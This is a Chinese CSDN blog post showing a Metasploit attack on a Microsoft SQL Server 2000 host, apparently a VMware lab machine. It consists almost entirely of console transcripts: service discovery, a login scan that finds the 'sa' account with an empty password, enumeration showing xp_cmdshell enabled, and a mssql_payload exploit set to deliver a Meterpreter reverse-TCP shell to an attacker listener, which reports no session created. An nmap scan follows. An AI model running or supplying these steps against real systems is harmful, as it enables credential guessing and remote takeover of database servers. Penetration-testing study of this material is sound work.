BT5入侵mssql

最新推荐文章于 2022-07-07 20:53:59 发布
最新推荐文章于 2022-07-07 20:53:59 发布
阅读量3.6k 收藏 2
点赞数
分类专栏: nmap metasploit mssqlserver2000 backtrack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/10044477
版权

mssql_ping:

msf  auxiliary(mssql_ping) > show options

Module options (auxiliary/scanner/mssql/mssql_ping):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target address range or CIDR identifier
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification

msf  auxiliary(mssql_ping) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf  auxiliary(mssql_ping) > run

[*] SQL Server information for 192.168.1.142:
[*]    ServerName      = ROOT-9743DD32E3
[*]    InstanceName    = MSSQLSERVER
[*]    IsClustered     = No
[*]    Version         = 8.00.194
[*]    tcp             = 1433
[*]    np              = \\ROOT-9743DD32E3\pipe\sql\query
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

mssql_login: 

msf  auxiliary(mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BLANK_PASSWORDS      true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   RHOSTS                                yes       The target address range or CIDR identifier
   RPORT                1433             yes       The target port
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   THREADS              1                yes       The number of concurrent threads
   USERNAME             sa               no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         true             no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification
   VERBOSE              true             yes       Whether to print output for all attempts

msf  auxiliary(mssql_login) > set RHOSTS 192.168.1.142
RHOSTS => 192.168.1.142
msf  auxiliary(mssql_login) > run

[*] 192.168.1.142:1433 - MSSQL - Starting authentication scanner.
[*] 192.168.1.142:1433 MSSQL - [1/2] - Trying username:'sa' with password:''
[+] 192.168.1.142:1433 - MSSQL - successful login 'sa' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

mssql_enum: 

msf  auxiliary(mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification

msf  auxiliary(mssql_enum) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf  auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*]     Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
[*]             May  3 2005 23:18:38 
[*]             Copyright (c) 1988-2003 Microsoft Corporation
[*]             Enterprise Evaluation Edition on Windows NT 5.1 (Build 2600: Service Pack 3)
[*] Configuration Parameters:
[*]     C2 Audit Mode is Not Enabled
[*]     xp_cmdshell is Enabled
[*]     remote access is Enabled
[*]     allow updates is Not Enabled
[*]     Database Mail XPs is Enabled
[*]     Ole Automation Procedures is Enabled
[*] Databases on the server:
[*]     Database name:master
[*]     Database Files for master:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf
[*]     Database name:tempdb
[*]     Database Files for tempdb:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\templog.ldf
[*]     Database name:model
[*]     Database Files for model:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\modellog.ldf
[*]     Database name:msdb
[*]     Database Files for msdb:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdblog.ldf
[*]     Database name:pubs
[*]     Database Files for pubs:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf
[*]     Database name:Northwind
[*]     Database Files for Northwind:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.ldf
[*]     Database name:fasttrack
[*]     Database Files for fasttrack:
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Data.MDF
[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\fasttrack_Log.LDF
[*] System Logins on this Server:
[*]     sa
[*]     BUILTIN\Administrators
[*] System Admin Logins on this Server:
[*]     BUILTIN\Administrators
[*]     sa
[*] Windows Logins on this Server:
[*]     No Windows logins found!
[*] Windows Groups that can logins on this Server:
[*]     BUILTIN\Administrators
[*] Accounts with Username and Password being the same:
[*]     No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*]     sa
[*] Stored Procedures with Public Execute Permission found:
[*]     xp_getfiledetails
[*]     xp_dirtree
[*]     xp_fixeddrives
[*]     xp_getnetname
[*]     sp_replsetoriginator
[*]     sp_replincrementlsn
[*]     xp_enum_activescriptengines
[*]     sp_repldone
[*]     xp_fileexist
[*]     sp_repltrans
[*]     xp_ntsec_enumdomains
[*]     sp_replcounters
[*]     sp_replcmds
[*]     sp_replpostschema
[*]     sp_replsetsyncstatus
[*]     sp_getbindtoken
[*]     sp_createorphan
[*]     xp_unc_to_drive
[*]     sp_droporphans
[*]     xp_MSplatform
[*]     sp_xml_preparedocument
[*]     sp_xml_removedocument
[*]     xp_IsNTAdmin
[*]     xp_MSnt2000
[*]     xp_grantlogin
[*]     xp_revokelogin
[*]     xp_MSLocalSystem
[*]     sp_prepexec
[*]     sp_prepexecrpc
[*]     sp_unprepare
[*]     xp_mergexpusage
[*]     xp_showlineage
[*]     sp_reset_connection
[*]     sp_getschemalock
[*]     xp_mapdown_bitmap
[*]     sp_releaseschemalock
[*]     sp_resyncprepare
[*]     sp_resyncexecute
[*]     xp_showcolv
[*]     sp_resyncexecutesql
[*]     sp_resyncuniquetable
[*]     sp_refreshview
[*]     sp_replsendtoqueue
[*]     sp_replwritetovarbin
[*]     xp_qv
[*]     xp_regread
[*] Instances found on this server:
[*]     MSSQLSERVER
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*]     LocalSystem
[*] Auxiliary module execution completed

mssql_payload: 

msf  exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(mssql_payload) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf  exploit(mssql_payload) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.11:4444 
[*] Command Stager progress -   1.47% done (1499/102246 bytes)
[*] Command Stager progress -   2.93% done (2998/102246 bytes)
[*] Command Stager progress -   4.40% done (4497/102246 bytes)
[*] Command Stager progress -   5.86% done (5996/102246 bytes)
[*] Command Stager progress -   7.33% done (7495/102246 bytes)
[*] Command Stager progress -   8.80% done (8994/102246 bytes)
[*] Command Stager progress -  10.26% done (10493/102246 bytes)
[*] Command Stager progress -  11.73% done (11992/102246 bytes)
[*] Command Stager progress -  13.19% done (13491/102246 bytes)
[*] Command Stager progress -  14.66% done (14990/102246 bytes)
[*] Command Stager progress -  16.13% done (16489/102246 bytes)
[*] Command Stager progress -  17.59% done (17988/102246 bytes)
[*] Command Stager progress -  19.06% done (19487/102246 bytes)
[*] Command Stager progress -  20.53% done (20986/102246 bytes)
[*] Command Stager progress -  21.99% done (22485/102246 bytes)
[*] Command Stager progress -  23.46% done (23984/102246 bytes)
[*] Command Stager progress -  24.92% done (25483/102246 bytes)
[*] Command Stager progress -  26.39% done (26982/102246 bytes)
[*] Command Stager progress -  27.86% done (28481/102246 bytes)
[*] Command Stager progress -  29.32% done (29980/102246 bytes)
[*] Command Stager progress -  30.79% done (31479/102246 bytes)
[*] Command Stager progress -  32.25% done (32978/102246 bytes)
[*] Command Stager progress -  33.72% done (34477/102246 bytes)
[*] Command Stager progress -  35.19% done (35976/102246 bytes)
[*] Command Stager progress -  36.65% done (37475/102246 bytes)
[*] Command Stager progress -  38.12% done (38974/102246 bytes)
[*] Command Stager progress -  39.58% done (40473/102246 bytes)
[*] Command Stager progress -  41.05% done (41972/102246 bytes)
[*] Command Stager progress -  42.52% done (43471/102246 bytes)
[*] Command Stager progress -  43.98% done (44970/102246 bytes)
[*] Command Stager progress -  45.45% done (46469/102246 bytes)
[*] Command Stager progress -  46.91% done (47968/102246 bytes)
[*] Command Stager progress -  48.38% done (49467/102246 bytes)
[*] Command Stager progress -  49.85% done (50966/102246 bytes)
[*] Command Stager progress -  51.31% done (52465/102246 bytes)
[*] Command Stager progress -  52.78% done (53964/102246 bytes)
[*] Command Stager progress -  54.24% done (55463/102246 bytes)
[*] Command Stager progress -  55.71% done (56962/102246 bytes)
[*] Command Stager progress -  57.18% done (58461/102246 bytes)
[*] Command Stager progress -  58.64% done (59960/102246 bytes)
[*] Command Stager progress -  60.11% done (61459/102246 bytes)
[*] Command Stager progress -  61.58% done (62958/102246 bytes)
[*] Command Stager progress -  63.04% done (64457/102246 bytes)
[*] Command Stager progress -  64.51% done (65956/102246 bytes)
[*] Command Stager progress -  65.97% done (67455/102246 bytes)
[*] Command Stager progress -  67.44% done (68954/102246 bytes)
[*] Command Stager progress -  68.91% done (70453/102246 bytes)
[*] Command Stager progress -  70.37% done (71952/102246 bytes)
[*] Command Stager progress -  71.84% done (73451/102246 bytes)
[*] Command Stager progress -  73.30% done (74950/102246 bytes)
[*] Command Stager progress -  74.77% done (76449/102246 bytes)
[*] Command Stager progress -  76.24% done (77948/102246 bytes)
[*] Command Stager progress -  77.70% done (79447/102246 bytes)
[*] Command Stager progress -  79.17% done (80946/102246 bytes)
[*] Command Stager progress -  80.63% done (82445/102246 bytes)
[*] Command Stager progress -  82.10% done (83944/102246 bytes)
[*] Command Stager progress -  83.57% done (85443/102246 bytes)
[*] Command Stager progress -  85.03% done (86942/102246 bytes)
[*] Command Stager progress -  86.50% done (88441/102246 bytes)
[*] Command Stager progress -  87.96% done (89940/102246 bytes)
[*] Command Stager progress -  89.43% done (91439/102246 bytes)
[*] Command Stager progress -  90.90% done (92938/102246 bytes)
[*] Command Stager progress -  92.36% done (94437/102246 bytes)
[*] Command Stager progress -  93.83% done (95936/102246 bytes)
[*] Command Stager progress -  95.29% done (97435/102246 bytes)
[*] Command Stager progress -  96.76% done (98934/102246 bytes)
[*] Command Stager progress -  98.19% done (100400/102246 bytes)
[*] Command Stager progress -  99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.

nmap: 

root@root:~# nmap -sU --script=ms-sql-info 192.168.1.142

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2013-05-14 19:35 EDT
Nmap scan report for 192.168.1.142
Host is up (0.00065s latency).
Not shown: 992 closed ports
PORT     STATE         SERVICE
123/udp  open          ntp
137/udp  open          netbios-ns
138/udp  open|filtered netbios-dgm
445/udp  open|filtered microsoft-ds
500/udp  open|filtered isakmp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:F1:31:D2 (VMware)

Host script results:
| ms-sql-info: 
|   Windows server name: ROOT-9743DD32E3
|   [192.168.1.142\MSSQLSERVER]
|     Instance name: MSSQLSERVER
|     Version: Microsoft SQL Server 2000 SP4
|       Version number: 8.00.2039.00
|       Product: Microsoft SQL Server 2000
|       Service pack level: SP4
|       Post-SP patches applied: No
|     TCP port: 1433
|     Named pipe: \\192.168.1.142\pipe\sql\query
|_    Clustered: No

Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds


feier7501
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BT5里sqlmap注入
weixin_33709219的博客
07-23 152
BT5里进行网站sql注入 对于一些喜欢***的朋友来讲,在进行实验时,总会遇到一些让人头痛的问题:如对于一些常见的asp网站,我们在对其进行安全检测的时候,发现网站存在注入点,可是在使用明小子,啊D,穿山甲等常用的注入点检测工具检测时发现该点可以注入,但是却找不到注入表或者找到了数据表但是找不到字段(那是因为你的数据库字典不够强大),我相信这时候很多人都苦恼了(一般的asp网站的数据库都是Ac...
从攻击MS SQL Server到获得系统访问权限
Make
07-23 336
from: https://www.freebuf.com/articles/database/22997.html 命令: useauxiliary/scanner/mssql/mssql_ping setRHOSTS192.168.23.0/24(我们目标的IP段) setTHREADS8 run 攻击 这次攻击是基于一个简单的原理。在大多数情况下,微...
MSSQL渗透备忘录
qq_40710190的博客
07-07 927
MSSQL
使用Metasploit对MSSQL渗透测试步骤——学习笔记
渗透测试
06-04 1042
学习笔记 使用metasploit对MSSQL渗透测试方法(因为本人靶机没有mssql服务,所以只有方法hh) 第一步,使用mssql_ping获取信息 Name: MSSQL Ping Utility Module: auxiliary/scanner/mssql/mssql_ping License: Metasploit Framework License (BSD) Rank: Normal Provided by: MC <mc@metasploit.
kali auxiliary扫描常用模块
weixin_43155143的博客
06-02 785
kali auxiliary扫描常用模块
PyQt5 + MySQL简单示例
04-28
PyQt5 + MySQL简单示例
mysql5.0入侵测试以及防范方法分享
09-10
MySQL 5.0 入侵测试与防范方法分享 首先,MySQL 5.0 入侵测试是指攻击者尝试访问和控制 MySQL 服务器的行为,而防范方法则是指保护 MySQL 服务器免受恶意攻击的措施。本文将详细介绍 MySQL 5.0 入侵测试的方法和...
mysql实验5
05-31
mysql实验5
mysql8、mysql5两个版本驱动
10-09
经测试,jdk1.5只能用mysql5驱动,大家可以自己测试一下
mysql入侵教程.rar
01-13
mysql入侵教程,,gaga xiazaiba
Metasploit-MSSQL渗透-实战篇
eT48_Sec
12-24 1万+
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。 打开metasploit的控制台终端: 先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。 从扫描结果中,我们得知目标对外开放了1433端口对应于ms
渗透之——Metasploit渗透MSSQL
冰河的专栏
01-18 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86535576 攻击机 kali 192.168.109.137 靶机 Win7_x64 192.168.109.139 数据库 MSSQL 2008 R2 MSSQL运行在TCP的1433端口以及UDP的1434端口 1.使用NMAP对MSSQL进行踩点 这里,我们使...
记一次基于mssql入侵
柳似烟的专栏
09-01 2179
通过扫描发现目标机器mssql存在弱口令
BackTrack5(BT5)各版本下载
weixin_30496431的博客
08-15 3061
BT5R3(最新版本)http://www.nigesb.com/backtrack-5-r3-released.html BT5R2KDE版32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT5R2-KDE-32.isoGNOME32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT...
msf 连接mssql_MSF爆破MSSQL
weixin_33195162的博客
02-07 541
msf auxiliary(scanner/mssql/mssql_login) >show optionsModule options (auxiliary/scanner/mssql/mssql_login):Name Current Setting Required Description---- ...
BT5上利用metasploit中usermap_script 模块攻击漏洞机系统
weixin_43196087的博客
09-26 1455
** 本文章为自我笔记与总结,希望可以帮助到他人 ** 首先我们需要准备虚拟机需要bt5作为操作机,linux作为漏洞机 两台虚拟机需要网络在同一网段我们是用的vmware12的版本 我们配置网络为net模式配置完需要重启网卡,在bt5中和linux中他们的方式都是一样的 /etc/init.d/networking restart 可以达到重启网卡的作用然后我们查看ip就可以发现可以ping通...
渗透工具之msf
热门推荐
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
mysql 入侵检测
最新发布
08-19
MySQL 入侵检测是通过监控和分析MySQL数据库的活动来识别潜在的安全威胁和入侵行为。以下是一些常见的MySQL入侵检测技术和策略: 1. 审计日志:MySQL提供了审计日志功能,记录了数据库中的所有活动。通过分析审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值